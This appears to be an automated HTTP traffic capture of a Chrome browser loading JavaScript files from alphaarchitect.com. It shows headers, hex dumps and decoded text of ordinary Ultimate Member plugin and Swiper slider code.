                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-cdc"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0c1d9d8ce6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC878INData Raw: 63 64 63 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2e 75 6d 2d 76 69 65 77 69 6e 67 20 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 62 6f 64 79 20 2e 75 6d 2d 72 6f 77 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 3b 30 3d 3d 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 22 29 2e 6c 65 6e 67 74 68 26 26 28 65 2e 70 72 65 76 28 22 2e 75 6d 2d 72 6f 77 2d 68 65 61 64 69 6e 67 22 29 2e 72 65 6d 6f 76 65 28 29 2c 65 2e 72 65 6d 6f 76 65 28 29 29 7d 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2e 75 6d 2d 76 69 65 77 69 6e 67 20 2e 75 6d 2d 70 72 6f 66 69 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: cdcjQuery(document).ready(function(){jQuery(".um-profile.um-viewing .um-profile-body .um-row").each(function(){var e=jQuery(this);0==e.find(".um-field").length&&(e.prev(".um-row-heading").remove(),e.remove())}),jQuery(".um-profile.um-viewing .um-profile
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 70 68 6f 74 6f 2d 6d 6f 64 61 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 73 72 63 22 29 3b 72 65 74 75 72 6e 20 75 6d 5f 6e 65 77 5f 6d 6f 64 61 6c 28 22 75 6d 5f 76 69 65 77 5f 70 68 6f 74 6f 22 2c 22 66 69 74 22 2c 21 30 2c 65 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 72 65 73 65 74 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 22 2e 75 6d 2d 70 72 6f 66 69 6c 65 2d 70 68 6f 74 6f 2d 69 6d 67
                                                                                                                                                                                                                                                                        Data Ascii: y).on("click",".um-photo-modal",function(e){e.preventDefault();e=jQuery(this).attr("data-src");return um_new_modal("um_view_photo","fit",!0,e),!1}),jQuery(document.body).on("click",".um-reset-profile-photo",function(e){return jQuery(".um-profile-photo-img
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1052INData Raw: 28 22 68 74 6d 6c 22 29 3b 6c 65 74 20 65 3d 74 2d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 76 61 6c 28 29 2e 6c 65 6e 67 74 68 3b 65 3d 28 65 3d 31 3d 3d 3d 70 61 72 73 65 49 6e 74 28 72 29 3f 74 2d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 76 61 6c 28 29 2e 72 65 70 6c 61 63 65 28 2f 28 3c 28 5b 5e 3e 5d 2b 29 3e 29 2f 67 69 2c 22 22 29 2e 6c 65 6e 67 74 68 3a 65 29 3c 30 3f 30 3a 65 2c 6a 51 75 65 72 79 28 22 73 70 61 6e 2e 75 6d 2d 6d 65 74 61 2d 62 69 6f 2d 63 68 61 72 61 63 74 65 72 20 73 70 61 6e 2e 75 6d 2d 62 69 6f 2d 6c 69 6d 69 74 22 29 2e 74 65 78 74 28 65 29 3b 72 3d 65 3c 35 3f 22 72 65 64 22 3a 22 22 3b 6a 51 75 65 72 79 28 22 73 70 61 6e 2e 75 6d 2d 6d 65 74 61 2d 62 69 6f 2d 63 68 61 72 61 63 74 65 72 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22
                                                                                                                                                                                                                                                                        Data Ascii: ("html");let e=t-jQuery(this).val().length;e=(e=1===parseInt(r)?t-jQuery(this).val().replace(/(<([^>]+)>)/gi,"").length:e)<0?0:e,jQuery("span.um-meta-bio-character span.um-bio-limit").text(e);r=e<5?"red":"";jQuery("span.um-meta-bio-character").css("color"
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        97192.168.2.449855141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC581OUTGET /wp-content/plugins/ultimate-member/assets/js/um-account.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-b4e"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0c2e895e6d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC878INData Raw: 62 34 65 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 6d 61 69 6e 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 63 75 72 72 65 6e 74 5f 74 61 62 22 29 3b 74 26 26 28 6a 51 75 65 72 79 28 27 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 74 61 62 5b 64 61 74 61 2d 74 61 62 3d 22 27 2b 74 2b 27 22 5d 27 29 2e 73 68 6f 77 28 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 74 61 62 3a 6e 6f 74 28 3a 76 69 73 69 62 6c 65 29 22 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 22 29 2e 6e 6f 74 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 5f 61
                                                                                                                                                                                                                                                                        Data Ascii: b4ejQuery(document).ready(function(){var t=jQuery(".um-account-main").attr("data-current_tab");t&&(jQuery('.um-account-tab[data-tab="'+t+'"]').show(),jQuery(".um-account-tab:not(:visible)").find("input, select, textarea").not(":disabled").addClass("um_a
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 74 69 76 65 3a 64 69 73 61 62 6c 65 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 6d 5f 61 63 63 6f 75 6e 74 5f 69 6e 61 63 74 69 76 65 22 29 2e 70 72 6f 70 28 22 64 69 73 61 62 6c 65 64 22 2c 21 31 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 21 31 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 61 63 63 6f 75 6e 74 2d 74 61 62 3a 6e 6f 74 28 3a 76 69 73 69 62 6c 65 29 22 29 2e 66 69 6e 64 28 22 69 6e 70 75 74 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 22 29 2e 6e 6f 74 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 61 64 64 43 6c 61 73 73 28 22 75 6d 5f 61 63 63 6f 75 6e 74 5f 69 6e 61 63 74 69 76 65 22 29 2e 70 72 6f 70 28 22 64 69 73 61 62 6c 65 64 22 2c 21 30 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 21 30 29 2c 6a 51 75
                                                                                                                                                                                                                                                                        Data Ascii: tive:disabled").removeClass("um_account_inactive").prop("disabled",!1).attr("disabled",!1),jQuery(".um-account-tab:not(:visible)").find("input, select, textarea").not(":disabled").addClass("um_account_inactive").prop("disabled",!0).attr("disabled",!0),jQu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC654INData Raw: 6d 2d 61 63 63 6f 75 6e 74 2d 73 69 64 65 20 6c 69 20 61 5b 64 61 74 61 2d 74 61 62 3d 22 27 2b 74 2b 27 22 5d 27 29 2e 61 64 64 43 6c 61 73 73 28 22 63 75 72 72 65 6e 74 22 29 2c 77 70 2e 68 6f 6f 6b 73 2e 64 6f 41 63 74 69 6f 6e 28 22 75 6d 5f 61 66 74 65 72 5f 61 63 63 6f 75 6e 74 5f 74 61 62 5f 63 68 61 6e 67 65 64 22 2c 74 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 72 65 71 75 65 73 74 2d 62 75 74 74 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 61 2c 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 61 63 74 69 6f 6e 22 29 2c 74 3d 6a 51 75 65 72 79 28 22 23 22 2b 65 29 2e 76
                                                                                                                                                                                                                                                                        Data Ascii: m-account-side li a[data-tab="'+t+'"]').addClass("current"),wp.hooks.doAction("um_after_account_tab_changed",t),!1}),jQuery(document.body).on("click",".um-request-button",function(t){t.preventDefault();var a,e=jQuery(this).data("action"),t=jQuery("#"+e).v
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        98192.168.2.449856141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC829OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/swiper.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-24185"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147815
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0f9efc184d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC876INData Raw: 37 64 63 34 0d 0a 76 61 72 20 53 77 69 70 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 69 6e 20 65 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 66 75 6e 63 74 69 6f 6e 20 74 28 73 2c 61 29 7b 76 6f 69 64 20 30 3d 3d 3d 73 26 26 28 73 3d 7b 7d 29 2c 76 6f 69 64 20 30 3d 3d 3d 61 26 26 28 61 3d 7b 7d 29 2c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 29 2e 66 6f 72 45 61 63 68 28 69 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 73 5b 69 5d 3f 73 5b 69 5d 3d 61 5b 69 5d 3a 65 28 61 5b 69 5d 29 26 26 65 28 73 5b 69 5d 29
                                                                                                                                                                                                                                                                        Data Ascii: 7dc4var Swiper=function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(s,a){void 0===s&&(s={}),void 0===a&&(a={}),Object.keys(a).forEach(i=>{void 0===s[i]?s[i]=a[i]:e(a[i])&&e(s[i])
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 68 61 73 68 3a 22 22 2c 68 6f 73 74 3a 22 22 2c 68 6f 73 74 6e 61 6d 65 3a 22 22 2c 68 72 65 66 3a 22 22 2c 6f 72 69 67 69 6e 3a 22 22 2c 70 61 74 68 6e 61 6d 65 3a 22 22 2c 70 72 6f 74 6f 63 6f 6c 3a 22 22 2c 73 65 61 72 63 68 3a 22 22 7d 2c 68 69 73 74 6f 72 79 3a 7b 72 65 70 6c 61 63 65 53 74 61 74 65 28 29 7b 7d 2c 70 75 73 68 53 74 61 74 65 28 29 7b 7d 2c 67 6f 28 29 7b 7d 2c 62 61 63 6b 28 29 7b 7d 7d 2c 43 75 73 74 6f 6d 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 29 7b 7d 2c 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 29 7b 7d 2c 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 3a 28 29 3d 3e 28 7b 67 65 74 50 72 6f 70 65 72 74 79 56 61
                                                                                                                                                                                                                                                                        Data Ascii: hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""},history:{replaceState(){},pushState(){},go(){},back(){}},CustomEvent:function(){return this},addEventListener(){},removeEventListener(){},getComputedStyle:()=>({getPropertyVa
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 3f 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 31 32 5d 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 34 5d 29 29 2c 22 79 22 3d 3d 3d 74 26 26 28 69 3d 73 2e 57 65 62 4b 69 74 43 53 53 4d 61 74 72 69 78 3f 6e 2e 6d 34 32 3a 31 36 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 31 33 5d 29 3a 70 61 72 73 65 46 6c 6f 61 74 28 61 5b 35 5d 29 29 2c 69 7c 7c 30 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 22 4f 62 6a 65 63 74 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                        Data Ascii: ?parseFloat(a[12]):parseFloat(a[4])),"y"===t&&(i=s.WebKitCSSMatrix?n.m42:16===a.length?parseFloat(a[13]):parseFloat(a[5])),i||0}function c(e){return"object"==typeof e&&null!==e&&e.constructor&&"Object"===Object.prototype.toString.call(e).slice(8,-1)}funct
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 2e 77 72 61 70 70 65 72 45 6c 2e 73 63 72 6f 6c 6c 54 6f 28 7b 5b 61 5d 3a 63 7d 29 2c 70 28 63 2c 73 29 29 72 65 74 75 72 6e 20 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 74 79 6c 65 2e 73 63 72 6f 6c 6c 53 6e 61 70 54 79 70 65 3d 22 22 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 22 2c 74 2e 77 72 61 70 70 65 72 45 6c 2e 73 63 72 6f 6c 6c 54 6f 28 7b 5b 61 5d 3a 63 7d 29 7d 29 2c 76 6f 69 64 20 69 2e 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 2e 63 73 73 4d 6f 64 65 46 72 61 6d 65 49 44 29 3b 74 2e 63 73 73 4d 6f 64 65 46 72 61 6d 65 49 44
                                                                                                                                                                                                                                                                        Data Ascii: .wrapperEl.scrollTo({[a]:c}),p(c,s))return t.wrapperEl.style.overflow="hidden",t.wrapperEl.style.scrollSnapType="",setTimeout(()=>{t.wrapperEl.style.overflow="",t.wrapperEl.scrollTo({[a]:c})}),void i.cancelAnimationFrame(t.cssModeFrameID);t.cssModeFrameID
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 69 64 74 68 22 3d 3d 3d 74 3f 22 6f 66 66 73 65 74 57 69 64 74 68 22 3a 22 6f 66 66 73 65 74 48 65 69 67 68 74 22 5d 2b 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 77 69 64 74 68 22 3d 3d 3d 74 3f 22 6d 61 72 67 69 6e 2d 72 69 67 68 74 22 3a 22 6d 61 72 67 69 6e 2d 74 6f 70 22 29 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 77 69 64 74 68 22 3d 3d 3d 74 3f 22 6d 61 72 67 69 6e 2d 6c 65 66 74 22 3a 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 22 29 29 3a 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7d 66 75 6e 63 74
                                                                                                                                                                                                                                                                        Data Ascii: idth"===t?"offsetWidth":"offsetHeight"]+parseFloat(a.getComputedStyle(e,null).getPropertyValue("width"===t?"margin-right":"margin-top"))+parseFloat(a.getComputedStyle(e,null).getPropertyValue("width"===t?"margin-left":"margin-bottom")):e.offsetWidth}funct
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 64 65 78 4f 66 28 22 73 61 66 61 72 69 22 29 3e 3d 30 26 26 74 2e 69 6e 64 65 78 4f 66 28 22 63 68 72 6f 6d 65 22 29 3c 30 26 26 74 2e 69 6e 64 65 78 4f 66 28 22 61 6e 64 72 6f 69 64 22 29 3c 30 7d 69 66 28 61 28 29 29 7b 63 6f 6e 73 74 20 74 3d 53 74 72 69 6e 67 28 65 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3b 69 66 28 74 2e 69 6e 63 6c 75 64 65 73 28 22 56 65 72 73 69 6f 6e 2f 22 29 29 7b 63 6f 6e 73 74 5b 65 2c 61 5d 3d 74 2e 73 70 6c 69 74 28 22 56 65 72 73 69 6f 6e 2f 22 29 5b 31 5d 2e 73 70 6c 69 74 28 22 20 22 29 5b 30 5d
                                                                                                                                                                                                                                                                        Data Ascii: ;function a(){const t=e.navigator.userAgent.toLowerCase();return t.indexOf("safari")>=0&&t.indexOf("chrome")<0&&t.indexOf("android")<0}if(a()){const t=String(e.navigator.userAgent);if(t.includes("Version/")){const[e,a]=t.split("Version/")[1].split(" ")[0]
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 29 2c 69 3d 65 2e 61 63 74 69 76 65 49 6e 64 65 78 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 67 72 69 64 26 26 65 2e 70 61 72 61 6d 73 2e 67 72 69 64 2e 72 6f 77 73 3e 31 29 7b 63 6f 6e 73 74 20 73 3d 69 2c 72 3d 5b 73 2d 74 5d 3b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 2e 2e 2e 41 72 72 61 79 2e 66 72 6f 6d 28 7b 6c 65 6e 67 74 68 3a 74 7d 29 2e 6d 61 70 28 28 65 2c 74 29 3d 3e 73 2b 61 2b 74 29 29 2c 76 6f 69 64 20 65 2e 73 6c 69 64 65 73 2e 66 6f 72 45 61 63 68 28 28 74 2c 73 29 3d 3e 7b 72 2e 69 6e 63 6c 75 64 65 73 28 74 2e 63 6f 6c 75 6d 6e 29 26 26 6b 28 65 2c 73 29 7d 29 7d 63 6f 6e 73 74 20 72 3d 69 2b 61 2d 31 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 72 65 77 69 6e 64 7c 7c 65 2e 70 61 72 61 6d 73 2e 6c 6f 6f 70 29 66 6f 72 28 6c 65 74 20 61 3d 69
                                                                                                                                                                                                                                                                        Data Ascii: ),i=e.activeIndex;if(e.params.grid&&e.params.grid.rows>1){const s=i,r=[s-t];return r.push(...Array.from({length:t}).map((e,t)=>s+a+t)),void e.slides.forEach((t,s)=>{r.includes(t.column)&&k(e,s)})}const r=i+a-1;if(e.params.rewind||e.params.loop)for(let a=i
                                                                                                                                                                                                                                                                        2024-12-20 12:44:58 UTC1369INData Raw: 2e 72 65 61 6c 49 6e 64 65 78 2c 30 2c 21 31 2c 21 30 29 3a 65 2e 73 6c 69 64 65 54 6f 28 65 2e 61 63 74 69 76 65 49 6e 64 65 78 2c 30 2c 21 31 2c 21 30 29 3a 65 2e 73 6c 69 64 65 54 6f 28 65 2e 73 6c 69 64 65 73 2e 6c 65 6e 67 74 68 2d 31 2c 30 2c 21 31 2c 21 30 29 2c 65 2e 61 75 74 6f 70 6c 61 79 26 26 65 2e 61 75 74 6f 70 6c 61 79 2e 72 75 6e 6e 69 6e 67 26 26 65 2e 61 75 74 6f 70 6c 61 79 2e 70 61 75 73 65 64 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 61 75 74 6f 70 6c 61 79 2e 72 65 73 69 7a 65 54 69 6d 65 6f 75 74 29 2c 65 2e 61 75 74 6f 70 6c 61 79 2e 72 65 73 69 7a 65 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 65 2e 61 75 74 6f 70 6c 61 79 26 26 65 2e 61 75 74 6f 70 6c 61 79 2e 72 75 6e 6e 69 6e 67 26 26 65
                                                                                                                                                                                                                                                                        Data Ascii: .realIndex,0,!1,!0):e.slideTo(e.activeIndex,0,!1,!0):e.slideTo(e.slides.length-1,0,!1,!0),e.autoplay&&e.autoplay.running&&e.autoplay.paused&&(clearTimeout(e.autoplay.resizeTimeout),e.autoplay.resizeTimeout=setTimeout(()=>{e.autoplay&&e.autoplay.running&&e
